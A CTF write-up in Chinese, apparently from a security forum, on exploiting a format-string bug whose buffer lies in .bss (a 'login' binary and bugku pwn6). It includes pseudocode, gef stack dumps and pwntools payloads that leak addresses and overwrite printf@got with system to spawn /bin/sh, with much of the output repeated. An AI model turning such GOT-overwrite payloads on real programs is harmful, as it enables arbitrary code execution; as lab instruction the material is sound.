[原创]攻击格式化字符串在.bss段的程序(bugku-pwn6)
发表于: 2021-5-28 12:47 15324
以login这道题为例,详细讲解下做这种题的思路。
查看保护:
很明显最后的函数中有典型的格式化字符串漏洞:
但buf在.bss段上,所以不能用自动化工具来打:
我们利用格式化字符串漏洞攻击got表,将printf修改成为system,然后之后循环中输入/bin/sh
就可以完成利用:
首先查看调用printf时的栈情况:
用这样的字符串可以泄露栈和libc的地址:
之后利用栈中指向栈数据的数据来构造攻击链:
因为要一次性写两个两字节的数据,需要两个地址,自然需要两条链条。构造链条代码如下:
可以看到利用构造的两条链条,printf已经被改成了system,以下是全部脚本:
以及攻击效果:
以bugku平台的pwn6为例,拿到文件后查看下信息:
有pie保护那么需要泄露main,libc的地址。
第一个函数中有缓冲区溢出风险:
而控制循环的变量正好位于其下方:
第二个函数里有格式化字符串漏洞:
尽管程序会对字符串进行移位操作:
并且buf不在栈上:
但如果在栈中构造好两个链条,还是有机会利用这个漏洞劫持printf@got。
第三个函数中有strcpy,存在栈溢出的风险:
可以用来将一些值部署在栈中。
第二个函数开辟了很多栈空间,而且并没有初始化栈空间的值:
这使得部分部署好的值不会被抹去(记得一定要初始化变量)
据此,此题的解题思路如下:
在调试中确定栈中情况:
转到函数二时栈情况如下:
此处笔者选择将栈顶和保存rbp的地址填充为printf@got+2和printf@got。
全部脚本如下:
运行效果:
通过本文中的练习,可以总结以下三点:
dc@ubuntu:~
/
playground$
file
.
/
login
.
/
login: ELF
32
-
bit LSB executable, Intel
80386
, version
1
(SYSV), dynamically linked, interpreter
/
lib
/
ld
-
linux.so.
2
,
for
GNU
/
Linux
2.6
.
32
, BuildID[sha1]
=
dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
dc@ubuntu:~
/
playground$ pwn checksec login
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
dc@ubuntu:~
/
playground$
file
.
/
login
.
/
login: ELF
32
-
bit LSB executable, Intel
80386
, version
1
(SYSV), dynamically linked, interpreter
/
lib
/
ld
-
linux.so.
2
,
for
GNU
/
Linux
2.6
.
32
, BuildID[sha1]
=
dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
dc@ubuntu:~
/
playground$ pwn checksec login
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
/*
 * IDA pseudocode of the target's entry point (the binary is stripped, so the
 * symbol names are the decompiler's). Disables stdio buffering, reads up to
 * 12 bytes of the "name" into the .bss buffer byte_804B080 and tail-calls
 * sub_80485E3.
 */
int
__cdecl main()
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    puts("Please input your name: ");
    /* read() does not NUL-terminate and its return value (-1 on error) is
     * ignored; a full 12-byte name is only terminated if the bytes that
     * follow byte_804B080 happen to be zero -- cannot be confirmed from the
     * listing. */
    read(0, byte_804B080, 0xCu);
    puts("Base maybe not easy......");
    return sub_80485E3();
}
/*
 * Echoes the name with a fixed format string -- this printf is safe, the
 * user data is an argument rather than the format -- then enters the
 * password loop in sub_804854B.
 */
int
sub_80485E3()
{
    printf("hello, %s", byte_804B080);
    return sub_804854B();
}
/*
 * Password loop. s1 is a .bss buffer (0x0804B0A0 in the IDA listing below),
 * not a stack buffer, which is why the usual stack-resident format-string
 * tooling does not apply to this binary.
 */
int
sub_804854B()
{
    puts("Please input your password: ");
    while (1)
    {
        /* read() returns -1 on error, which would index s1[-1]; a full
         * 0x32-byte read places the terminator at s1[0x32] -- whether that is
         * still inside s1 cannot be told from the `db ?` declaration. */
        s1[read(0, s1, 0x32u)] = 0;
        if (!strncmp(s1, "wllmmllw", 8u))
            break;
        printf("This is the wrong password: ");
        /* CWE-134: the attacker-supplied buffer is the format string itself,
         * so %p conversions disclose stack contents and %n conversions write
         * memory. The fix is printf("%s", s1) or fputs(s1, stdout); Full
         * RELRO (the binary is built with Partial RELRO, see checksec above)
         * would additionally make the GOT read-only. */
        printf(s1);
        puts("Try again!");
    }
    return puts("Login successfully! Have fun!");
}
/*
 * IDA pseudocode of the target's entry point (the binary is stripped, so the
 * symbol names are the decompiler's). Disables stdio buffering, reads up to
 * 12 bytes of the "name" into the .bss buffer byte_804B080 and tail-calls
 * sub_80485E3.
 */
int
__cdecl main()
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    puts("Please input your name: ");
    /* read() does not NUL-terminate and its return value (-1 on error) is
     * ignored; a full 12-byte name is only terminated if the bytes that
     * follow byte_804B080 happen to be zero -- cannot be confirmed from the
     * listing. */
    read(0, byte_804B080, 0xCu);
    puts("Base maybe not easy......");
    return sub_80485E3();
}
/*
 * Echoes the name with a fixed format string -- this printf is safe, the
 * user data is an argument rather than the format -- then enters the
 * password loop in sub_804854B.
 */
int
sub_80485E3()
{
    printf("hello, %s", byte_804B080);
    return sub_804854B();
}
/*
 * Password loop. s1 is a .bss buffer (0x0804B0A0 in the IDA listing below),
 * not a stack buffer, which is why the usual stack-resident format-string
 * tooling does not apply to this binary.
 */
int
sub_804854B()
{
    puts("Please input your password: ");
    while (1)
    {
        /* read() returns -1 on error, which would index s1[-1]; a full
         * 0x32-byte read places the terminator at s1[0x32] -- whether that is
         * still inside s1 cannot be told from the `db ?` declaration. */
        s1[read(0, s1, 0x32u)] = 0;
        if (!strncmp(s1, "wllmmllw", 8u))
            break;
        printf("This is the wrong password: ");
        /* CWE-134: the attacker-supplied buffer is the format string itself,
         * so %p conversions disclose stack contents and %n conversions write
         * memory. The fix is printf("%s", s1) or fputs(s1, stdout); Full
         * RELRO (the binary is built with Partial RELRO, see checksec above)
         * would additionally make the GOT read-only. */
        printf(s1);
        puts("Try again!");
    }
    return puts("Login successfully! Have fun!");
}
printf(s1);
printf(s1);
.bss:
0804B0A0
s1 db ? ; DATA XREF: sub_804854B
+
1B
↑o
.bss:
0804B0A0
s1 db ? ; DATA XREF: sub_804854B
+
1B
↑o
printf(s1);
-
-
-
-
-
-
-
-
-
after attack
-
-
-
-
-
-
-
-
-
>
system(
'/bin/sh'
);
printf(s1);
-
-
-
-
-
-
-
-
-
after attack
-
-
-
-
-
-
-
-
-
>
system(
'/bin/sh'
);
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
─────────────────────────────────────────────────────────────── code:x86:
32
────
0x80485a4
add esp,
0x10
0x80485a7
sub esp,
0xc
0x80485aa
push
0x804b0a0
→
0x80485af
call
0x8048400
<printf@plt>
↳
0x8048400
<printf@plt
+
0
> jmp DWORD PTR ds:
0x804b014
0x8048406
<printf@plt
+
6
> push
0x10
0x804840b
<printf@plt
+
11
> jmp
0x80483d0
0x8048410
<puts@plt
+
0
> jmp DWORD PTR ds:
0x804b018
0x8048416
<puts@plt
+
6
> push
0x18
0x804841b
<puts@plt
+
11
> jmp
0x80483d0
─────────────────────────────────────────────────────── arguments (guessed) ────
printf@plt (
[sp
+
0x0
]
=
0x0804b0a0
→
"%42988c%6$hn"
,
[sp
+
0x4
]
=
0x08048dae
→
"wllmmllw"
,
[sp
+
0x8
]
=
0x00000008
,
[sp
+
0xc
]
=
0x080485fb
→ add esp,
0x10
,
[sp
+
0x10
]
=
0x08048dfd
→
"hello, %s"
)
─────────────────────────────────────────────────────────────────── threads ────
[
#0] Id 1, Name: "login", stopped 0x80485af in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[
#0] 0x80485af → call 0x8048400 <printf@plt>
[
#1] 0x8048603 → nop
[
#2] 0x8048689 → nop
[
#3] 0xf7dc1647 → __libc_start_main()
[
#4] 0x8048471 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤ dereference $esp
20
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
0xffc6a7f0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xffc6a7f4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7f8
│
+
0x0028
:
0xffc6a808
→
0x00000000
0xffc6a7fc
│
+
0x002c
:
0x08048689
→ nop
0xffc6a800
│
+
0x0030
:
0xf7f5c3dc
→
0xf7f5d1e0
→
0x00000000
0xffc6a804
│
+
0x0034
:
0xffc6a820
→
0x00000001
0xffc6a808
│
+
0x0038
:
0x00000000
0xffc6a80c
│
+
0x003c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
0xffc6a810
│
+
0x0040
:
0xf7f5c000
→
0x001b2db0
0xffc6a814
│
+
0x0044
:
0xf7f5c000
→
0x001b2db0
0xffc6a818
│
+
0x0048
:
0x00000000
0xffc6a81c
│
+
0x004c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
─────────────────────────────────────────────────────────────── code:x86:
32
────
0x80485a4
add esp,
0x10
0x80485a7
sub esp,
0xc
0x80485aa
push
0x804b0a0
→
0x80485af
call
0x8048400
<printf@plt>
↳
0x8048400
<printf@plt
+
0
> jmp DWORD PTR ds:
0x804b014
0x8048406
<printf@plt
+
6
> push
0x10
0x804840b
<printf@plt
+
11
> jmp
0x80483d0
0x8048410
<puts@plt
+
0
> jmp DWORD PTR ds:
0x804b018
0x8048416
<puts@plt
+
6
> push
0x18
0x804841b
<puts@plt
+
11
> jmp
0x80483d0
─────────────────────────────────────────────────────── arguments (guessed) ────
printf@plt (
[sp
+
0x0
]
=
0x0804b0a0
→
"%42988c%6$hn"
,
[sp
+
0x4
]
=
0x08048dae
→
"wllmmllw"
,
[sp
+
0x8
]
=
0x00000008
,
[sp
+
0xc
]
=
0x080485fb
→ add esp,
0x10
,
[sp
+
0x10
]
=
0x08048dfd
→
"hello, %s"
)
─────────────────────────────────────────────────────────────────── threads ────
[
#0] Id 1, Name: "login", stopped 0x80485af in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[
#0] 0x80485af → call 0x8048400 <printf@plt>
[
#1] 0x8048603 → nop
[
#2] 0x8048689 → nop
[
#3] 0xf7dc1647 → __libc_start_main()
[
#4] 0x8048471 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤ dereference $esp
20
0xffc6a7d0
│
+
0x0000
:
0x0804b0a0
→
"%42988c%6$hn"
← $esp
0xffc6a7d4
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xffc6a7d8
│
+
0x0008
:
0x00000008
0xffc6a7dc
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xffc6a7e0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xffc6a7e4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7e8
│
+
0x0018
:
0xffc6a7f8
→
0xffc6a808
→
0x00000000
← $ebp
0xffc6a7ec
│
+
0x001c
:
0x08048603
→ nop
0xffc6a7f0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xffc6a7f4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xffc6a7f8
│
+
0x0028
:
0xffc6a808
→
0x00000000
0xffc6a7fc
│
+
0x002c
:
0x08048689
→ nop
0xffc6a800
│
+
0x0030
:
0xf7f5c3dc
→
0xf7f5d1e0
→
0x00000000
0xffc6a804
│
+
0x0034
:
0xffc6a820
→
0x00000001
0xffc6a808
│
+
0x0038
:
0x00000000
0xffc6a80c
│
+
0x003c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
0xffc6a810
│
+
0x0040
:
0xf7f5c000
→
0x001b2db0
0xffc6a814
│
+
0x0044
:
0xf7f5c000
→
0x001b2db0
0xffc6a818
│
+
0x0048
:
0x00000000
0xffc6a81c
│
+
0x004c
:
0xf7dc1647
→ <__libc_start_main
+
247
> add esp,
0x10
payload1
=
'\n%6$p\n%15$p\n'
payload1
=
'\n%6$p\n%15$p\n'
0xffc6a7f8
(栈中)
-
>
0xffc6a808
(栈中)
-
> 栈中(printf@got)
-
> printf
0xffc6a7f8
(栈中)
-
>
0xffc6xxxx
(栈中)
-
> 栈中(printf@got
+
2
)
0xffc6a7f8
(栈中)
-
>
0xffc6a808
(栈中)
-
> 栈中(printf@got)
-
> printf
0xffc6a7f8
(栈中)
-
>
0xffc6xxxx
(栈中)
-
> 栈中(printf@got
+
2
)
def DoubSzWt(number,deviation):
    """Return the conversion pair ``%<number>c%<deviation>$hn`` as a str.

    Both arguments are rendered with ``str()`` semantics; no range checking
    is done here.
    """
    return '%{0}c%{1}$hn'.format(number, deviation)
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54700c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5c8
→
0x00000000
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5c8
→
0x00000000
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45076c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x08048603
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x08048603
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54716c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45078c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x08048689
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x08048689
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%48560c%7$hn%14899c%11$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e4
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"/bin/sh"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e3bdb0
→ <system
+
0
> sub esp,
0xc
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e3
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
def DoubSzWt(number,deviation):
    """Return the conversion pair ``%<number>c%<deviation>$hn`` as a str.

    Both arguments are rendered with ``str()`` semantics; no range checking
    is done here.
    """
    return '%{0}c%{1}$hn'.format(number, deviation)
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54700c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5c8
→
0x00000000
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5c8
→
0x00000000
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45076c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x08048603
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x08048603
→ nop
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x08048603
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%54716c%6$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5ac
→
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%45078c%10$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x08048689
→ nop ← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x08048689
→ nop
0xfff4d5bc
│
+
0x002c
:
0x08048689
→ nop
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"%48560c%7$hn%14899c%11$hn"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e4a680
→ <printf
+
0
> call
0xf7f20c79
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e4
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e4
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
payload
=
'%'
+
str
